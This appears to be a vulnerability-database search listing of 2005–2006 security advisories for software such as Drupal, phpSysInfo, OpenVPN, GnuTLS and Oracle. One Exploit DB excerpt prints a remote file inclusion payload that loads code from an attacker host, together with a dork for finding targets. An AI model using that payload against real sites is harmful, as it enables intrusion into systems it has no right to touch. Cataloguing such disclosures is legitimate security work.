Lucene search

9971 matches found

FreeBSD
added 2006/05/18 12:0 a.m., 28 views

drupal -- multiple vulnerabilities

The Drupal team reports: Vulnerability: SQL injection A security vulnerability in the database layer allowed certain queries to be submitted to the database without going through Drupal's query sanitizer. Vulnerability: Execution of arbitrary files Certain -- alas, typical -- configurations of...

7.1 AI score
Exploits: 0, References: 2
Tenable Nessus
added 2006/05/13 12:0 a.m., 16 views

FreeBSD : phpSysInfo -- 'register_globals' emulation layer overwrite vulnerability (9c1cea79-548a-11da-b53f-0004614cc33d)

A Secunia Advisory reports: Christopher Kunz has reported a vulnerability in phpSysInfo, which can be exploited by malicious people to manipulate certain information. The vulnerability is caused due to an error in the 'register_globals' emulation layer where certain arrays used by the system can ...

6 AI score
Exploits: 0, References: 2
Tenable Nessus
added 2006/05/13 12:0 a.m., 17 views

FreeBSD : mambo -- 'register_globals' emulation layer overwrite vulnerability (ffb82d3a-610f-11da-8823-00123ffe8333)

A Secunia Advisory reports: peter MC tachatte has discovered a vulnerability in Mambo, which can be exploited by malicious people to manipulate certain information and compromise a vulnerable system. The vulnerability is caused due to an error in the 'register_globals' emulation layer in...

5.5 AI score
Exploits: 0, References: 2
Exploit DB
added 2006/05/07 12:0 a.m., 143 views

EQdkp 1.3.0 - 'dbal.php' Remote File Inclusion

Title: EQdkp = 1.3.0 Remote File Inclusion URL: http://www.eqdkp.com/ Dork: "powered by EQdkp" Author: OLiBekaS greetz: Skulmatic, weleh, brockencode, and all papmahackerlink crew Exploit: /includes/dbal.php?eqdkprootpath=http://yourhost/cmd.gif?cmd=ls milw0rm.com 2006-05-07...

7.4 AI score
Exploits: 0
Packet Storm
added 2006/05/06 12:0 a.m., 39 views

openvpn207.txt

Hi, There is a flaw well more a stupid design than anything else in OpenVPN 2.0.7 and below in the Remote Management Interface that allows an attacker to gain complete control because there is NO AUTHENTICATION YES NO AUTHENTICATION AT ALL!. This can be carried out from within the LAN that th...

7.4 AI score
Exploits: 0
OSV
added 2006/04/11 11:2 p.m., 2 views

DEBIAN-CVE-2006-1721

digestmd5.c in the CMU Cyrus Simple Authentication and Security Layer (SASL) library 2.1.18, and possibly other versions before 2.1.21, allows remote unauthenticated attackers to cause a denial of service (segmentation fault) via malformed inputs in DIGEST-MD5 negotiation...

2.6 CVSS, 8.7 AI score, 0.0243 EPSS
Exploits: 0, References: 1
Debian
added 2006/03/06 8:5 a.m., 20 views

[SECURITY] [DSA 986-1] New gnutls11 packages fix arbitrary code execution

Debian Security Advisory DSA 986-1 [email protected] http://www.debian.org/security/ Martin Schulze March 6th, 2006 http://www.debian.org/security/faq -...

7.5 CVSS, 6.6 AI score, 0.03507 EPSS
Exploits: 0
OSV
added 2006/03/06 12:0 a.m., 10 views

DSA-986-1 gnutls11 - buffer overflows

Bulletin has no description...

7.5 CVSS, 6.3 AI score, 0.03507 EPSS
Exploits: 0
securityvulns
added 2006/02/07 12:0 a.m., 69 views

[ Secuobs - Tools release ] BSS (Bluetooth Stack Smasher) fuzzer

Software BSS - Bluetooth Stack Smasher Version 0.6 Location BSS could be downloaded on http://www.secuobs.com/news/05022006-bluetooth10.shtml Credits Pierre Betouin - [email protected] Bug was found on following devices : hcidump, Sony/ericsson K600i/V600i/W800i, Nokia N70 & SAMSUNG E73...

Exploits: 0
myhack58
added 2006/01/26 12:0 a.m., 15 views

Rookie Edition Exploit the guidelines for the preparation of the PNP the overflow vulnerability analysis+exploit-vulnerability warning-the black bar safety net

A month ago, and chat with friends, talked about now on the network, worms, viruses are increasingly rampant, the year before the “shock wave”, last year's “shock wave”, this year also don't know and out of what? The voice just fell, the one is named Zotob worm has been in a 8 on 1 to 5 November...

8.1 AI score
Exploits: 0
Prion
added 2006/01/18 11:3 a.m., 22 views

Design/Logic Flaw

Unspecified vulnerability in the Net Foundation Layer component of Oracle Database server 8.1.7.4, 9.0.1.5, 9.0.1.5 FIPS, 9.2.0.6, and 10.1.0.4 has unspecified impact and attack vectors, as identified by Oracle Vuln DB08...

10 CVSS, 6.5 AI score, 0.03864 EPSS
Exploits: 0, References: 9, Affected Software: 4
NVD
added 2006/01/18 11:3 a.m., 19 views

CVE-2006-0262

Unspecified vulnerability in the Net Foundation Layer component of Oracle Database server 8.1.7.4, 9.0.1.5, 9.0.1.5 FIPS, 9.2.0.6, and 10.1.0.4 has unspecified impact and attack vectors, as identified by Oracle Vuln DB08...

10 CVSS, 6.3 AI score, 0.03864 EPSS
Exploits: 0, References: 9
CVE
added 2006/01/18 11:0 a.m., 64 views

CVE-2006-0262

Technical details for CVE-2006-0262 are not publicly provided in the supplied documents; no explicit affected versions or remediation are included. Monitor for updates.

10 CVSS, 6.3 AI score, 0.03864 EPSS
Exploits: 0, References: 9, Affected Software: 4
Tenable Nessus
added 2006/01/15 12:0 a.m., 50 views

Ubuntu 4.10 : linux-source-2.6.8.1 vulnerabilities (USN-95-1)

A remote Denial of Service vulnerability was discovered in the Netfilter IP packet handler. This allowed a remote attacker to crash the machine by sending specially crafted IP packet fragments. CAN-2005-0209 The Netfilter code also contained a memory leak. Certain locally generated packet fragmen...

7.8 CVSS, 6.8 AI score, 0.03966 EPSS
Exploits: 6, References: 8
Tenable Nessus
added 2005/11/16 12:0 a.m., 120 views

phpSysInfo < 2.4.1 Multiple Vulnerabilities

The remote host is running phpSysInfo, a PHP application that parses the /proc entries on Linux/Unix systems and displays them in HTML. The installed version of phpSysInfo on the remote host has a design flaw in its globalization layer such that the script's variables can be overwritten independe...

6.8 CVSS, 5.6 AI score, 0.03716 EPSS
Exploits: 1, References: 5
FreeBSD
added 2005/11/10 12:0 a.m., 15 views

phpSysInfo -- "register_globals" emulation layer overwrite vulnerability

A Secunia Advisory reports: Christopher Kunz has reported a vulnerability in phpSysInfo, which can be exploited by malicious people to manipulate certain information. The vulnerability is caused due to an error in the "register_globals" emulation layer where certain arrays used by the system can b...

0.5 AI score
Exploits: 0, References: 2
OpenVAS
added 2005/11/03 12:0 a.m., 20 views

snmpwalk 'scanner'

This plugin runs snmpwalk against the remote machine to find open ports. SPDX-FileCopyrightText: 2004 Michel Arboi Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only ifdescription...

7.3 AI score
Exploits: 0
RedHat Linux
added 2005/10/17 7:52 a.m., 3 views

security flaw

pam_ldap and nss_ldap, when used with OpenLDAP and connecting to a slave using TLS, does not use TLS for the subsequent connection if the client is referred to a master, which may cause a password to be sent in cleartext and allows remote attackers to sniff the password...

5 CVSS, 5.8 AI score, 0.02752 EPSS
Exploits: 0, References: 4
Gentoo Linux
added 2005/08/19 12:0 a.m., 38 views

Kismet: Multiple vulnerabilities

Background Kismet is an 802.11 Layer 2 wireless network detector, sniffer, and intrusion detection system. Description Kismet is vulnerable to a heap overflow when handling pcap captures and to an integer underflow in the CDP protocol dissector. Impact With a specially crafted packet an attacker...

10 CVSS, 7.4 AI score, 0.04733 EPSS
Exploits: 0
RedHat Linux
added 2005/08/09 3:54 p.m., 36 views

Important: Red Hat Security Advisory: cups security update

Updated CUPS packages that fix a security issue are now available for Red Hat Enterprise Linux. This update has been rated as having important security impact by the Red Hat Security Response Team. The Common UNIX Printing System (CUPS) provides a portable printing layer for UNIX(R) operating systems...

2.1 CVSS, 5.7 AI score, 0.00429 EPSS
Exploits: 0, References: 2